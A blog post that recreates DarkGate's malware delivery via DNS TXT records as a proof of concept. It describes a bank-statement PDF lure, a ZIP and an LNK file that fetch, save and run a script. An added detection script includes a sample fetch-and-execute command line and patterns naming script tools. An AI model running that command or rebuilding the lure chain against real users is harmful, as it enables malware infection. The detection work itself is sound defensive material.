DarkGate Install Script retrieval via DNS TXT Record

Recently, I came across a tweet from Unit 42 showcasing an interesting new technique used by DarkGate in its recent campaign: the DarkGate install script is retrieved via DNS TXT records, leading to a DarkGate infection on the victim machine.

I developed a PoC for this DNS TXT record install script retrieval technique and uploaded it to the following repo, which consists of –

  • PDF with embedded link (Name: Bank-Statement-poc.pdf)
  • ZIP Archive (Name: Bank-Statement-20231523-poc.pdf.zip)
    • contains the LNK (Shortcut) file which retrieves the install script via DNS TXT records (Name: Bank-Statement-20231523-poc.pdf.lnk)

Disclaimer: The PoC does not contain any malicious code =) – also, it is a working PoC, so you can just use it easily.

Infection Chain: Working

Following is the infection chain, similar to the one seen in the ITW DarkGate campaign –

First, we open the PDF (Bank-Statement-poc.pdf), which contains an embedded link that, when clicked, downloads the ZIP archive (Bank-Statement-20231523-poc.pdf.zip).

The ZIP archive contains an LNK (shortcut) file which, once executed, runs a command that uses nslookup to retrieve the TXT records from my testing domain “pocdomain[.]linkpc[.]net”. I customized the LNK command a bit, as the one in the ITW sample was unstable. The command then parses and dequotes the retrieved TXT record, saves it in the TEMP directory as “poc.cmd”, and then executes it.
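As an added defensive example (not part of the original PoC or post), the Python below scores a process command line for the three indicators the chain above describes (a TXT-type nslookup, its output written as a .cmd under %TEMP%, and that file executed in the same command), and reassembles the quoted strings of a TXT answer the way the LNK stage must, to judge whether the record carries a script rather than SPF/DKIM text. All telemetry is constructed, and the domain txt-poc.example is a placeholder.

```python
import re

# --- Stage 1: the shortcut's command line ---------------------------------
# One regex per indicator. An admin running nslookup alone trips only the
# first, which is why the indicators are scored rather than alerted on singly.
TXT_LOOKUP = re.compile(r"nslookup\b.*-(?:type|q|querytype)=txt\b", re.I)
TEMP_WRITE = re.compile(r">\s*%TEMP%\\[\w.-]+\.(?:cmd|bat)\b", re.I)
TEMP_EXEC = re.compile(r"(?:&+\s*|start\s+)%TEMP%\\[\w.-]+\.(?:cmd|bat)\b", re.I)

def score_command_line(parent_image: str, cmdline: str) -> int:
    """0-4: one point per indicator present, plus one when the parent is
    explorer.exe (a double-clicked LNK) rather than an interactive shell."""
    score = sum(bool(p.search(cmdline)) for p in (TXT_LOOKUP, TEMP_WRITE, TEMP_EXEC))
    if score and parent_image.lower() == "explorer.exe":
        score += 1
    return score

# --- Stage 2: the TXT answer itself -----------------------------------------
# nslookup prints a TXT record as one or more quoted strings on one line (a
# record over 255 bytes is split). Joining them is the "dequote" step the
# post mentions; doing it defender-side exposes the payload actually carried.
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')
SCRIPT_TOKENS = re.compile(r"@echo off|powershell|cmd(?:\.exe)?\s+/c|%TEMP%|certutil|mshta", re.I)
LEGIT_PREFIX = re.compile(r"^(?:v=spf1|v=DKIM1|v=DMARC1|[\w-]+-site-verification=)", re.I)

def dequote_txt(nslookup_line: str) -> str:
    """Concatenate the quoted strings of one TXT answer into a single payload."""
    return "".join(QUOTED.findall(nslookup_line)).replace('\\"', '"')

def classify_txt(nslookup_line: str) -> str:
    payload = dequote_txt(nslookup_line)
    if LEGIT_PREFIX.match(payload):
        return "benign"  # mail-auth / site-verification records
    return "suspicious" if SCRIPT_TOKENS.search(payload) else "unknown"

# Constructed sample telemetry (not real DarkGate artefacts); placeholder domain.
PROCESS_EVENTS = [
    ("explorer.exe", r"cmd.exe /c nslookup -type=txt txt-poc.example > %TEMP%\poc.cmd & %TEMP%\poc.cmd"),
    ("cmd.exe", "nslookup -type=txt example.com"),
    ("explorer.exe", r"cmd.exe /c copy report.pdf %TEMP%\report.pdf"),
]
TXT_ANSWERS = [
    r'txt-poc.example  text = "@echo off" "echo constructed sample > %TEMP%\sample.txt"',
    r'example.com  text = "v=spf1 include:_spf.example.com -all"',
    r'example.com  text = "abc123-constructed-token"',
]

if __name__ == "__main__":
    print([score_command_line(p, c) for p, c in PROCESS_EVENTS])  # [4, 1, 0]
    print([classify_txt(l) for l in TXT_ANSWERS])  # ['suspicious', 'benign', 'unknown']
```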

Posted by Prapattimynk